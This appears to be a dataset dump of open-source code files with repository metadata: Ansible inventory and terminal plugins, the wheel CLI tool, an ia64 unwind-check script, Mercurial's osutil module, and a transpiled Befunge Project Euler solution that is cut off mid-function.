repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
tersmitten/ansible | lib/ansible/plugins/inventory/openstack.py | 14 | 13236 | # Copyright (c) 2012, Marco Vito Moscaritolo <marco@agavee.com>
# Copyright (c) 2013, Jesse Keating <jesse.keating@rackspace.com>
# Copyright (c) 2015, Hewlett-Packard Development Company, L.P.
# Copyright (c) 2016, Rackspace Australia
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
name: openstack
plugin_type: inventory
author:
- Marco Vito Moscaritolo <marco@agavee.com>
- Jesse Keating <jesse.keating@rackspace.com>
short_description: OpenStack inventory source
requirements:
- openstacksdk
extends_documentation_fragment:
- inventory_cache
- constructed
description:
- Get inventory hosts from OpenStack clouds
- Uses openstack.(yml|yaml) YAML configuration file to configure the inventory plugin
- Uses standard clouds.yaml YAML configuration file to configure cloud credentials
options:
plugin:
description: token that ensures this is a source file for the 'openstack' plugin.
required: True
choices: ['openstack']
show_all:
description: toggles showing all vms vs only those with a working IP
type: bool
default: 'no'
inventory_hostname:
description: |
What to register as the inventory hostname.
If set to 'uuid' the uuid of the server will be used and a
group will be created for the server name.
If set to 'name' the name of the server will be used unless
there are more than one server with the same name in which
case the 'uuid' logic will be used.
Default is to do 'name', which is the opposite of the old
openstack.py inventory script's option use_hostnames)
type: string
choices:
- name
- uuid
default: "name"
expand_hostvars:
description: |
Run extra commands on each host to fill in additional
information about the host. May interrogate cinder and
neutron and can be expensive for people with many hosts.
(Note, the default value of this is opposite from the default
old openstack.py inventory script's option expand_hostvars)
type: bool
default: 'no'
private:
description: |
Use the private interface of each server, if it has one, as
the host's IP in the inventory. This can be useful if you are
running ansible inside a server in the cloud and would rather
communicate to your servers over the private network.
type: bool
default: 'no'
only_clouds:
description: |
List of clouds from clouds.yaml to use, instead of using
the whole list.
type: list
default: []
fail_on_errors:
description: |
Causes the inventory to fail and return no hosts if one cloud
has failed (for example, bad credentials or being offline).
When set to False, the inventory will return as many hosts as
it can from as many clouds as it can contact. (Note, the
default value of this is opposite from the old openstack.py
inventory script's option fail_on_errors)
type: bool
default: 'no'
clouds_yaml_path:
description: |
Override path to clouds.yaml file. If this value is given it
will be searched first. The default path for the
ansible inventory adds /etc/ansible/openstack.yaml and
/etc/ansible/openstack.yml to the regular locations documented
at https://docs.openstack.org/os-client-config/latest/user/configuration.html#config-files
type: string
env:
- name: OS_CLIENT_CONFIG_FILE
compose:
description: Create vars from jinja2 expressions.
type: dictionary
default: {}
groups:
description: Add hosts to group based on Jinja2 conditionals.
type: dictionary
default: {}
'''
EXAMPLES = '''
# file must be named openstack.yaml or openstack.yml
# Make the plugin behave like the default behavior of the old script
plugin: openstack
expand_hostvars: yes
fail_on_errors: yes
'''
import collections
import sys
from ansible.errors import AnsibleParserError
from ansible.plugins.inventory import BaseInventoryPlugin, Constructable, Cacheable
try:
# Due to the name shadowing we should import other way
import importlib
sdk = importlib.import_module('openstack')
sdk_inventory = importlib.import_module('openstack.cloud.inventory')
client_config = importlib.import_module('openstack.config.loader')
HAS_SDK = True
except ImportError:
HAS_SDK = False
class InventoryModule(BaseInventoryPlugin, Constructable, Cacheable):
''' Host inventory provider for ansible using OpenStack clouds. '''
NAME = 'openstack'
def parse(self, inventory, loader, path, cache=True):
super(InventoryModule, self).parse(inventory, loader, path)
cache_key = self._get_cache_prefix(path)
# file is config file
self._config_data = self._read_config_data(path)
msg = ''
if not self._config_data:
msg = 'File empty. this is not my config file'
elif 'plugin' in self._config_data and self._config_data['plugin'] != self.NAME:
msg = 'plugin config file, but not for us: %s' % self._config_data['plugin']
elif 'plugin' not in self._config_data and 'clouds' not in self._config_data:
msg = "it's not a plugin configuration nor a clouds.yaml file"
elif not HAS_SDK:
msg = "openstacksdk is required for the OpenStack inventory plugin. OpenStack inventory sources will be skipped."
if msg:
raise AnsibleParserError(msg)
# The user has pointed us at a clouds.yaml file. Use defaults for
# everything.
if 'clouds' in self._config_data:
self._config_data = {}
# update cache if the user has caching enabled and the cache is being refreshed
# will update variable below in the case of an expired cache
cache_needs_update = not cache and self.get_option('cache')
if cache:
cache = self.get_option('cache')
source_data = None
if cache:
try:
source_data = self._cache[cache_key]
except KeyError:
# cache expired or doesn't exist yet
cache_needs_update = True
if not source_data:
clouds_yaml_path = self._config_data.get('clouds_yaml_path')
if clouds_yaml_path:
config_files = (clouds_yaml_path +
client_config.CONFIG_FILES)
else:
config_files = None
# Redict logging to stderr so it does not mix with output
# particular ansible-inventory JSON output
# TODO(mordred) Integrate openstack's logging with ansible's logging
sdk.enable_logging(stream=sys.stderr)
cloud_inventory = sdk_inventory.OpenStackInventory(
config_files=config_files,
private=self._config_data.get('private', False))
only_clouds = self._config_data.get('only_clouds', [])
if only_clouds and not isinstance(only_clouds, list):
raise ValueError(
'OpenStack Inventory Config Error: only_clouds must be'
' a list')
if only_clouds:
new_clouds = []
for cloud in cloud_inventory.clouds:
if cloud.name in only_clouds:
new_clouds.append(cloud)
cloud_inventory.clouds = new_clouds
expand_hostvars = self._config_data.get('expand_hostvars', False)
fail_on_errors = self._config_data.get('fail_on_errors', False)
source_data = cloud_inventory.list_hosts(
expand=expand_hostvars, fail_on_cloud_config=fail_on_errors)
if cache_needs_update:
self._cache[cache_key] = source_data
self._populate_from_source(source_data)
def _populate_from_source(self, source_data):
groups = collections.defaultdict(list)
firstpass = collections.defaultdict(list)
hostvars = {}
use_server_id = (
self._config_data.get('inventory_hostname', 'name') != 'name')
show_all = self._config_data.get('show_all', False)
for server in source_data:
if 'interface_ip' not in server and not show_all:
continue
firstpass[server['name']].append(server)
for name, servers in firstpass.items():
if len(servers) == 1 and not use_server_id:
self._append_hostvars(hostvars, groups, name, servers[0])
else:
server_ids = set()
# Trap for duplicate results
for server in servers:
server_ids.add(server['id'])
if len(server_ids) == 1 and not use_server_id:
self._append_hostvars(hostvars, groups, name, servers[0])
else:
for server in servers:
self._append_hostvars(
hostvars, groups, server['id'], server,
namegroup=True)
self._set_variables(hostvars, groups)
def _set_variables(self, hostvars, groups):
# set vars in inventory from hostvars
for host in hostvars:
# create composite vars
self._set_composite_vars(
self._config_data.get('compose'), hostvars[host], host)
# actually update inventory
for key in hostvars[host]:
self.inventory.set_variable(host, key, hostvars[host][key])
# constructed groups based on conditionals
self._add_host_to_composed_groups(
self._config_data.get('groups'), hostvars[host], host)
# constructed groups based on jinja expressions
self._add_host_to_keyed_groups(
self._config_data.get('keyed_groups'), hostvars[host], host)
for group_name, group_hosts in groups.items():
self.inventory.add_group(group_name)
for host in group_hosts:
self.inventory.add_child(group_name, host)
def _get_groups_from_server(self, server_vars, namegroup=True):
groups = []
region = server_vars['region']
cloud = server_vars['cloud']
metadata = server_vars.get('metadata', {})
# Create a group for the cloud
groups.append(cloud)
# Create a group on region
if region:
groups.append(region)
# And one by cloud_region
groups.append("%s_%s" % (cloud, region))
# Check if group metadata key in servers' metadata
if 'group' in metadata:
groups.append(metadata['group'])
for extra_group in metadata.get('groups', '').split(','):
if extra_group:
groups.append(extra_group.strip())
groups.append('instance-%s' % server_vars['id'])
if namegroup:
groups.append(server_vars['name'])
for key in ('flavor', 'image'):
if 'name' in server_vars[key]:
groups.append('%s-%s' % (key, server_vars[key]['name']))
for key, value in iter(metadata.items()):
groups.append('meta-%s_%s' % (key, value))
az = server_vars.get('az', None)
if az:
# Make groups for az, region_az and cloud_region_az
groups.append(az)
groups.append('%s_%s' % (region, az))
groups.append('%s_%s_%s' % (cloud, region, az))
return groups
def _append_hostvars(self, hostvars, groups, current_host,
server, namegroup=False):
hostvars[current_host] = dict(
ansible_ssh_host=server['interface_ip'],
ansible_host=server['interface_ip'],
openstack=server)
self.inventory.add_host(current_host)
for group in self._get_groups_from_server(server, namegroup=namegroup):
groups[group].append(current_host)
def verify_file(self, path):
if super(InventoryModule, self).verify_file(path):
for fn in ('openstack', 'clouds'):
for suffix in ('yaml', 'yml'):
maybe = '{fn}.{suffix}'.format(fn=fn, suffix=suffix)
if path.endswith(maybe):
return True
return False
| gpl-3.0 |
erwilan/ansible | lib/ansible/plugins/terminal/dellos9.py | 71 | 2779 | #
# (c) 2016 Red Hat Inc.
#
# Copyright (c) 2017 Dell Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import re
import json
from ansible.module_utils._text import to_text, to_bytes
from ansible.plugins.terminal import TerminalBase
from ansible.errors import AnsibleConnectionFailure
class TerminalModule(TerminalBase):
terminal_stdout_re = [
re.compile(br"[\r\n]?[\w+\-\.:\/\[\]]+(?:\([^\)]+\)){,3}(?:>|#) ?$"),
re.compile(br"\[\w+\@[\w\-\.]+(?: [^\]])\] ?[>#\$] ?$")
]
terminal_stderr_re = [
re.compile(br"% ?Error: (?:(?!\bdoes not exist\b)(?!\balready exists\b)(?!\bHost not found\b)(?!\bnot active\b).)*$"),
re.compile(br"% ?Bad secret"),
re.compile(br"invalid input", re.I),
re.compile(br"(?:incomplete|ambiguous) command", re.I),
re.compile(br"connection timed out", re.I),
re.compile(br"'[^']' +returned error code: ?\d+"),
]
def on_open_shell(self):
try:
self._exec_cli_command(b'terminal length 0')
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to set terminal parameters')
def on_authorize(self, passwd=None):
if self._get_prompt().endswith(b'#'):
return
cmd = {u'command': u'enable'}
if passwd:
cmd[u'prompt'] = to_text(r"[\r\n]?password: $", errors='surrogate_or_strict')
cmd[u'answer'] = passwd
try:
self._exec_cli_command(to_bytes(json.dumps(cmd), errors='surrogate_or_strict'))
except AnsibleConnectionFailure:
raise AnsibleConnectionFailure('unable to elevate privilege to enable mode')
def on_deauthorize(self):
prompt = self._get_prompt()
if prompt is None:
# if prompt is None most likely the terminal is hung up at a prompt
return
if prompt.strip().endswith(b')#'):
self._exec_cli_command(b'end')
self._exec_cli_command(b'disable')
elif prompt.endswith(b'#'):
self._exec_cli_command(b'disable')
| gpl-3.0 |
znoland3/zachdemo | venvdir/lib/python3.4/site-packages/wheel/tool/__init__.py | 238 | 13310 | """
Wheel command-line utility.
"""
import os
import hashlib
import sys
import json
import wheel.paths
from glob import iglob
from .. import signatures
from ..util import (urlsafe_b64decode, urlsafe_b64encode, native, binary,
matches_requirement)
from ..install import WheelFile
def require_pkgresources(name):
try:
import pkg_resources
except ImportError:
raise RuntimeError("'{0}' needs pkg_resources (part of setuptools).".format(name))
import argparse
class WheelError(Exception): pass
# For testability
def get_keyring():
try:
from ..signatures import keys
import keyring
except ImportError:
raise WheelError("Install wheel[signatures] (requires keyring, pyxdg) for signatures.")
return keys.WheelKeys, keyring
def keygen(get_keyring=get_keyring):
"""Generate a public/private key pair."""
WheelKeys, keyring = get_keyring()
ed25519ll = signatures.get_ed25519ll()
wk = WheelKeys().load()
keypair = ed25519ll.crypto_sign_keypair()
vk = native(urlsafe_b64encode(keypair.vk))
sk = native(urlsafe_b64encode(keypair.sk))
kr = keyring.get_keyring()
kr.set_password("wheel", vk, sk)
sys.stdout.write("Created Ed25519 keypair with vk={0}\n".format(vk))
if isinstance(kr, keyring.backends.file.BaseKeyring):
sys.stdout.write("in {0}\n".format(kr.file_path))
else:
sys.stdout.write("in %r\n" % kr.__class__)
sk2 = kr.get_password('wheel', vk)
if sk2 != sk:
raise WheelError("Keyring is broken. Could not retrieve secret key.")
sys.stdout.write("Trusting {0} to sign and verify all packages.\n".format(vk))
wk.add_signer('+', vk)
wk.trust('+', vk)
wk.save()
def sign(wheelfile, replace=False, get_keyring=get_keyring):
"""Sign a wheel"""
WheelKeys, keyring = get_keyring()
ed25519ll = signatures.get_ed25519ll()
wf = WheelFile(wheelfile, append=True)
wk = WheelKeys().load()
name = wf.parsed_filename.group('name')
sign_with = wk.signers(name)[0]
sys.stdout.write("Signing {0} with {1}\n".format(name, sign_with[1]))
vk = sign_with[1]
kr = keyring.get_keyring()
sk = kr.get_password('wheel', vk)
keypair = ed25519ll.Keypair(urlsafe_b64decode(binary(vk)),
urlsafe_b64decode(binary(sk)))
record_name = wf.distinfo_name + '/RECORD'
sig_name = wf.distinfo_name + '/RECORD.jws'
if sig_name in wf.zipfile.namelist():
raise WheelError("Wheel is already signed.")
record_data = wf.zipfile.read(record_name)
payload = {"hash":"sha256=" + native(urlsafe_b64encode(hashlib.sha256(record_data).digest()))}
sig = signatures.sign(payload, keypair)
wf.zipfile.writestr(sig_name, json.dumps(sig, sort_keys=True))
wf.zipfile.close()
def unsign(wheelfile):
"""
Remove RECORD.jws from a wheel by truncating the zip file.
RECORD.jws must be at the end of the archive. The zip file must be an
ordinary archive, with the compressed files and the directory in the same
order, and without any non-zip content after the truncation point.
"""
import wheel.install
vzf = wheel.install.VerifyingZipFile(wheelfile, "a")
info = vzf.infolist()
if not (len(info) and info[-1].filename.endswith('/RECORD.jws')):
raise WheelError("RECORD.jws not found at end of archive.")
vzf.pop()
vzf.close()
def verify(wheelfile):
"""Verify a wheel.
The signature will be verified for internal consistency ONLY and printed.
Wheel's own unpack/install commands verify the manifest against the
signature and file contents.
"""
wf = WheelFile(wheelfile)
sig_name = wf.distinfo_name + '/RECORD.jws'
sig = json.loads(native(wf.zipfile.open(sig_name).read()))
verified = signatures.verify(sig)
sys.stderr.write("Signatures are internally consistent.\n")
sys.stdout.write(json.dumps(verified, indent=2))
sys.stdout.write('\n')
def unpack(wheelfile, dest='.'):
"""Unpack a wheel.
Wheel content will be unpacked to {dest}/{name}-{ver}, where {name}
is the package name and {ver} its version.
:param wheelfile: The path to the wheel.
:param dest: Destination directory (default to current directory).
"""
wf = WheelFile(wheelfile)
namever = wf.parsed_filename.group('namever')
destination = os.path.join(dest, namever)
sys.stderr.write("Unpacking to: %s\n" % (destination))
wf.zipfile.extractall(destination)
wf.zipfile.close()
def install(requirements, requirements_file=None,
wheel_dirs=None, force=False, list_files=False,
dry_run=False):
"""Install wheels.
:param requirements: A list of requirements or wheel files to install.
:param requirements_file: A file containing requirements to install.
:param wheel_dirs: A list of directories to search for wheels.
:param force: Install a wheel file even if it is not compatible.
:param list_files: Only list the files to install, don't install them.
:param dry_run: Do everything but the actual install.
"""
# If no wheel directories specified, use the WHEELPATH environment
# variable, or the current directory if that is not set.
if not wheel_dirs:
wheelpath = os.getenv("WHEELPATH")
if wheelpath:
wheel_dirs = wheelpath.split(os.pathsep)
else:
wheel_dirs = [ os.path.curdir ]
# Get a list of all valid wheels in wheel_dirs
all_wheels = []
for d in wheel_dirs:
for w in os.listdir(d):
if w.endswith('.whl'):
wf = WheelFile(os.path.join(d, w))
if wf.compatible:
all_wheels.append(wf)
# If there is a requirements file, add it to the list of requirements
if requirements_file:
# If the file doesn't exist, search for it in wheel_dirs
# This allows standard requirements files to be stored with the
# wheels.
if not os.path.exists(requirements_file):
for d in wheel_dirs:
name = os.path.join(d, requirements_file)
if os.path.exists(name):
requirements_file = name
break
with open(requirements_file) as fd:
requirements.extend(fd)
to_install = []
for req in requirements:
if req.endswith('.whl'):
# Explicitly specified wheel filename
if os.path.exists(req):
wf = WheelFile(req)
if wf.compatible or force:
to_install.append(wf)
else:
msg = ("{0} is not compatible with this Python. "
"--force to install anyway.".format(req))
raise WheelError(msg)
else:
# We could search on wheel_dirs, but it's probably OK to
# assume the user has made an error.
raise WheelError("No such wheel file: {}".format(req))
continue
# We have a requirement spec
# If we don't have pkg_resources, this will raise an exception
matches = matches_requirement(req, all_wheels)
if not matches:
raise WheelError("No match for requirement {}".format(req))
to_install.append(max(matches))
# We now have a list of wheels to install
if list_files:
sys.stdout.write("Installing:\n")
if dry_run:
return
for wf in to_install:
if list_files:
sys.stdout.write(" {0}\n".format(wf.filename))
continue
wf.install(force=force)
wf.zipfile.close()
def install_scripts(distributions):
"""
Regenerate the entry_points console_scripts for the named distribution.
"""
try:
from setuptools.command import easy_install
import pkg_resources
except ImportError:
raise RuntimeError("'wheel install_scripts' needs setuptools.")
for dist in distributions:
pkg_resources_dist = pkg_resources.get_distribution(dist)
install = wheel.paths.get_install_command(dist)
command = easy_install.easy_install(install.distribution)
command.args = ['wheel'] # dummy argument
command.finalize_options()
command.install_egg_scripts(pkg_resources_dist)
def convert(installers, dest_dir, verbose):
require_pkgresources('wheel convert')
# Only support wheel convert if pkg_resources is present
from ..wininst2wheel import bdist_wininst2wheel
from ..egg2wheel import egg2wheel
for pat in installers:
for installer in iglob(pat):
if os.path.splitext(installer)[1] == '.egg':
conv = egg2wheel
else:
conv = bdist_wininst2wheel
if verbose:
sys.stdout.write("{0}... ".format(installer))
sys.stdout.flush()
conv(installer, dest_dir)
if verbose:
sys.stdout.write("OK\n")
def parser():
p = argparse.ArgumentParser()
s = p.add_subparsers(help="commands")
def keygen_f(args):
keygen()
keygen_parser = s.add_parser('keygen', help='Generate signing key')
keygen_parser.set_defaults(func=keygen_f)
def sign_f(args):
sign(args.wheelfile)
sign_parser = s.add_parser('sign', help='Sign wheel')
sign_parser.add_argument('wheelfile', help='Wheel file')
sign_parser.set_defaults(func=sign_f)
def unsign_f(args):
unsign(args.wheelfile)
unsign_parser = s.add_parser('unsign', help=unsign.__doc__)
unsign_parser.add_argument('wheelfile', help='Wheel file')
unsign_parser.set_defaults(func=unsign_f)
def verify_f(args):
verify(args.wheelfile)
verify_parser = s.add_parser('verify', help=verify.__doc__)
verify_parser.add_argument('wheelfile', help='Wheel file')
verify_parser.set_defaults(func=verify_f)
def unpack_f(args):
unpack(args.wheelfile, args.dest)
unpack_parser = s.add_parser('unpack', help='Unpack wheel')
unpack_parser.add_argument('--dest', '-d', help='Destination directory',
default='.')
unpack_parser.add_argument('wheelfile', help='Wheel file')
unpack_parser.set_defaults(func=unpack_f)
def install_f(args):
install(args.requirements, args.requirements_file,
args.wheel_dirs, args.force, args.list_files)
install_parser = s.add_parser('install', help='Install wheels')
install_parser.add_argument('requirements', nargs='*',
help='Requirements to install.')
install_parser.add_argument('--force', default=False,
action='store_true',
help='Install incompatible wheel files.')
install_parser.add_argument('--wheel-dir', '-d', action='append',
dest='wheel_dirs',
help='Directories containing wheels.')
install_parser.add_argument('--requirements-file', '-r',
help="A file containing requirements to "
"install.")
install_parser.add_argument('--list', '-l', default=False,
dest='list_files',
action='store_true',
help="List wheels which would be installed, "
"but don't actually install anything.")
install_parser.set_defaults(func=install_f)
def install_scripts_f(args):
install_scripts(args.distributions)
install_scripts_parser = s.add_parser('install-scripts', help='Install console_scripts')
install_scripts_parser.add_argument('distributions', nargs='*',
help='Regenerate console_scripts for these distributions')
install_scripts_parser.set_defaults(func=install_scripts_f)
def convert_f(args):
convert(args.installers, args.dest_dir, args.verbose)
convert_parser = s.add_parser('convert', help='Convert egg or wininst to wheel')
convert_parser.add_argument('installers', nargs='*', help='Installers to convert')
convert_parser.add_argument('--dest-dir', '-d', default=os.path.curdir,
help="Directory to store wheels (default %(default)s)")
convert_parser.add_argument('--verbose', '-v', action='store_true')
convert_parser.set_defaults(func=convert_f)
def version_f(args):
from .. import __version__
sys.stdout.write("wheel %s\n" % __version__)
version_parser = s.add_parser('version', help='Print version and exit')
version_parser.set_defaults(func=version_f)
def help_f(args):
p.print_help()
help_parser = s.add_parser('help', help='Show this help')
help_parser.set_defaults(func=help_f)
return p
def main():
p = parser()
args = p.parse_args()
if not hasattr(args, 'func'):
p.print_help()
else:
# XXX on Python 3.3 we get 'args has no func' rather than short help.
try:
args.func(args)
return 0
except WheelError as e:
sys.stderr.write(e.message + "\n")
return 1
| mit |
SharkBa1t/cse524 | arch/ia64/scripts/unwcheck.py | 13143 | 1714 | #!/usr/bin/python
#
# Usage: unwcheck.py FILE
#
# This script checks the unwind info of each function in file FILE
# and verifies that the sum of the region-lengths matches the total
# length of the function.
#
# Based on a shell/awk script originally written by Harish Patil,
# which was converted to Perl by Matthew Chapman, which was converted
# to Python by David Mosberger.
#
import os
import re
import sys
if len(sys.argv) != 2:
print "Usage: %s FILE" % sys.argv[0]
sys.exit(2)
readelf = os.getenv("READELF", "readelf")
start_pattern = re.compile("<([^>]*)>: \[0x([0-9a-f]+)-0x([0-9a-f]+)\]")
rlen_pattern = re.compile(".*rlen=([0-9]+)")
def check_func (func, slots, rlen_sum):
if slots != rlen_sum:
global num_errors
num_errors += 1
if not func: func = "[%#x-%#x]" % (start, end)
print "ERROR: %s: %lu slots, total region length = %lu" % (func, slots, rlen_sum)
return
num_funcs = 0
num_errors = 0
func = False
slots = 0
rlen_sum = 0
for line in os.popen("%s -u %s" % (readelf, sys.argv[1])):
m = start_pattern.match(line)
if m:
check_func(func, slots, rlen_sum)
func = m.group(1)
start = long(m.group(2), 16)
end = long(m.group(3), 16)
slots = 3 * (end - start) / 16
rlen_sum = 0L
num_funcs += 1
else:
m = rlen_pattern.match(line)
if m:
rlen_sum += long(m.group(1))
check_func(func, slots, rlen_sum)
if num_errors == 0:
print "No errors detected in %u functions." % num_funcs
else:
if num_errors > 1:
err="errors"
else:
err="error"
print "%u %s detected in %u functions." % (num_errors, err, num_funcs)
sys.exit(1)
| gpl-2.0 |
suncycheng/intellij-community | plugins/hg4idea/testData/bin/mercurial/osutil.py | 90 | 5363 | # osutil.py - pure Python version of osutil.c
#
# Copyright 2009 Matt Mackall <mpm@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
import os
import stat as statmod
def _mode_to_kind(mode):
if statmod.S_ISREG(mode):
return statmod.S_IFREG
if statmod.S_ISDIR(mode):
return statmod.S_IFDIR
if statmod.S_ISLNK(mode):
return statmod.S_IFLNK
if statmod.S_ISBLK(mode):
return statmod.S_IFBLK
if statmod.S_ISCHR(mode):
return statmod.S_IFCHR
if statmod.S_ISFIFO(mode):
return statmod.S_IFIFO
if statmod.S_ISSOCK(mode):
return statmod.S_IFSOCK
return mode
def listdir(path, stat=False, skip=None):
'''listdir(path, stat=False) -> list_of_tuples
Return a sorted list containing information about the entries
in the directory.
If stat is True, each element is a 3-tuple:
(name, type, stat object)
Otherwise, each element is a 2-tuple:
(name, type)
'''
result = []
prefix = path
if not prefix.endswith(os.sep):
prefix += os.sep
names = os.listdir(path)
names.sort()
for fn in names:
st = os.lstat(prefix + fn)
if fn == skip and statmod.S_ISDIR(st.st_mode):
return []
if stat:
result.append((fn, _mode_to_kind(st.st_mode), st))
else:
result.append((fn, _mode_to_kind(st.st_mode)))
return result
if os.name != 'nt':
posixfile = open
else:
import ctypes, msvcrt
_kernel32 = ctypes.windll.kernel32
_DWORD = ctypes.c_ulong
_LPCSTR = _LPSTR = ctypes.c_char_p
_HANDLE = ctypes.c_void_p
_INVALID_HANDLE_VALUE = _HANDLE(-1).value
# CreateFile
_FILE_SHARE_READ = 0x00000001
_FILE_SHARE_WRITE = 0x00000002
_FILE_SHARE_DELETE = 0x00000004
_CREATE_ALWAYS = 2
_OPEN_EXISTING = 3
_OPEN_ALWAYS = 4
_GENERIC_READ = 0x80000000
_GENERIC_WRITE = 0x40000000
_FILE_ATTRIBUTE_NORMAL = 0x80
# open_osfhandle flags
_O_RDONLY = 0x0000
_O_RDWR = 0x0002
_O_APPEND = 0x0008
_O_TEXT = 0x4000
_O_BINARY = 0x8000
# types of parameters of C functions used (required by pypy)
_kernel32.CreateFileA.argtypes = [_LPCSTR, _DWORD, _DWORD, ctypes.c_void_p,
_DWORD, _DWORD, _HANDLE]
_kernel32.CreateFileA.restype = _HANDLE
def _raiseioerror(name):
err = ctypes.WinError()
raise IOError(err.errno, '%s: %s' % (name, err.strerror))
class posixfile(object):
'''a file object aiming for POSIX-like semantics
CPython's open() returns a file that was opened *without* setting the
_FILE_SHARE_DELETE flag, which causes rename and unlink to abort.
This even happens if any hardlinked copy of the file is in open state.
We set _FILE_SHARE_DELETE here, so files opened with posixfile can be
renamed and deleted while they are held open.
Note that if a file opened with posixfile is unlinked, the file
remains but cannot be opened again or be recreated under the same name,
until all reading processes have closed the file.'''
def __init__(self, name, mode='r', bufsize=-1):
if 'b' in mode:
flags = _O_BINARY
else:
flags = _O_TEXT
m0 = mode[0]
if m0 == 'r' and '+' not in mode:
flags |= _O_RDONLY
access = _GENERIC_READ
else:
# work around http://support.microsoft.com/kb/899149 and
# set _O_RDWR for 'w' and 'a', even if mode has no '+'
flags |= _O_RDWR
access = _GENERIC_READ | _GENERIC_WRITE
if m0 == 'r':
creation = _OPEN_EXISTING
elif m0 == 'w':
creation = _CREATE_ALWAYS
elif m0 == 'a':
creation = _OPEN_ALWAYS
flags |= _O_APPEND
else:
raise ValueError("invalid mode: %s" % mode)
fh = _kernel32.CreateFileA(name, access,
_FILE_SHARE_READ | _FILE_SHARE_WRITE | _FILE_SHARE_DELETE,
None, creation, _FILE_ATTRIBUTE_NORMAL, None)
if fh == _INVALID_HANDLE_VALUE:
_raiseioerror(name)
fd = msvcrt.open_osfhandle(fh, flags)
if fd == -1:
_kernel32.CloseHandle(fh)
_raiseioerror(name)
f = os.fdopen(fd, mode, bufsize)
# unfortunately, f.name is '<fdopen>' at this point -- so we store
# the name on this wrapper. We cannot just assign to f.name,
# because that attribute is read-only.
object.__setattr__(self, 'name', name)
object.__setattr__(self, '_file', f)
def __iter__(self):
return self._file
def __getattr__(self, name):
return getattr(self._file, name)
def __setattr__(self, name, value):
'''mimics the read-only attributes of Python file objects
by raising 'TypeError: readonly attribute' if someone tries:
f = posixfile('foo.txt')
f.name = 'bla' '''
return self._file.__setattr__(name, value)
| apache-2.0 |
Mikescher/Project-Euler_Befunge | compiled/Python2/Euler_Problem-065.py | 1 | 3340 | #!/usr/bin/env python2
# transpiled with BefunCompile v1.3.0 (c) 2017
import sys
import zlib, base64
_g = ("AR+LCAAAAAAABADNUjFuwzAM/ApLKUsIJRTtDBEMolNXfyBwhg5aNXny40s3TlI0bge1BXqDcKQE8njiCN57MLjfAfwV/rG+8SETYldZS/EFNR0JGU9cFiIlTbXa8BUL"
+ "t1wE+2gMe0ZL+1p9H5T6eO/yvOtGlmBiC2duUhY75zBzKhZ3XzuiKYZmk56mC6dmL1tzlDRvqeVM6XCgjVWihrMUC/btbExYd0RvTqkEN5zjwhnKenvs0brZXvjV6wnU"
+ "gSNwEVwCF4yIg+HbPdL3B+vzfu6ip3E+LuNXQHlZGMnmUbDp1WpFoJ988HAlIZ5tlOplNrwBk9ih3GAEAAA=")
g = base64.b64decode(_g)[1:]
for i in range(ord(base64.b64decode(_g)[0])):
g = zlib.decompress(g, 16+zlib.MAX_WBITS)
g=list(map(ord, g))
def gr(x,y):
if(x>=0 and y>=0 and x<80 and y<14):
return g[y*80 + x];
return 0;
def gw(x,y,v):
if(x>=0 and y>=0 and x<80 and y<14):
g[y*80 + x]=v;
def td(a,b):
return ((0)if(b==0)else(a//b))
def tm(a,b):
return ((0)if(b==0)else(a%b))
s=[]
def sp():
global s
if (len(s) == 0):
return 0
return s.pop()
def sa(v):
global s
s.append(v)
def sr():
global s
if (len(s) == 0):
return 0
return s[-1]
def _0():
gw(79,0,48)
gw(79,2,48)
sa(70)
sa(70)
return 1
def _1():
return (24)if(sp()!=0)else(2)
def _2():
gw(79,0,48)
gw(79,2,49)
gw(4,0,0)
sp();
sa(99)
sa(99)
return 3
def _3():
return (4)if(sp()!=0)else(23)
def _4():
sa((sr()-1)%3)
sa(sr());
return (5)if(sp()!=0)else(22)
def _5():
sa(sp()-2)
return (21)if(sp()!=0)else(6)
def _6():
gw(2,0,1)
return 7
def _7():
gw(3,0,79)
sa(79)
sa(gr(79,0)-48)
return 8
def _8():
global t0
global t1
t0=gr(gr(3,0),2)-48
gw(gr(3,0),0,gr(gr(3,0),2))
t0=t0*gr(2,0)
sa(sp()+t0)
t1=sp()
t1=t1+gr(4,0)
gw(gr(3,0),2,(t1%10)+48)
t1=t1/10
gw(4,0,t1)
return (20)if(sr()!=9)else(9)
def _9():
sp();
sa(sp()-1)
return (19)if(sr()!=-1)else(10)
def _10():
sp();
sa(0)
sa(70)
sa(gr(79,2)-48)
sa(gr(79,2)-48)
return 11
def _11():
return (12)if(sp()!=0)else(18)
def _12():
v0=sp()
v1=sp()
sa(v0)
sa(v1)
return 13
def _13():
sa(sr());
return (17)if(sp()!=0)else(14)
def _14():
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(sr());
return (15)if(sp()!=0)else(16)
def _15():
sa(sp()+sp());
return 14
def _16():
global t0
sa(sp()+sp());
t0=sp()
sys.stdout.write(str(t0)+" ")
sys.stdout.flush()
return 25
def _17():
sa(sp()-1)
sa(gr(sr()+9,2)-48)
sa(sr());
return 11
def _18():
return (17)if(sp()!=0)else(13)
def _19():
sa(sr());
return 3
def _20():
sa(sp()-1)
sa(sr());
gw(3,0,sp())
sa(sr());
sa(0)
v0=sp()
sa(gr(sp(),v0))
sa(sp()-48)
return 8
def _21():
gw(2,0,((sr()+1)/3)*2)
return 7
def _22():
gw(2,0,1)
sp();
return 7
def _23():
gw(2,0,2)
return 7
def _24():
sa(sp()-1)
sa(sr()+9)
sa(48)
v0=sp()
v1=sp()
sa(v0)
sa(v1)
sa(0)
v0=sp()
v1=sp()
gw(v1,v0,sp())
sa(sr()+9)
sa(48)
v0=sp()
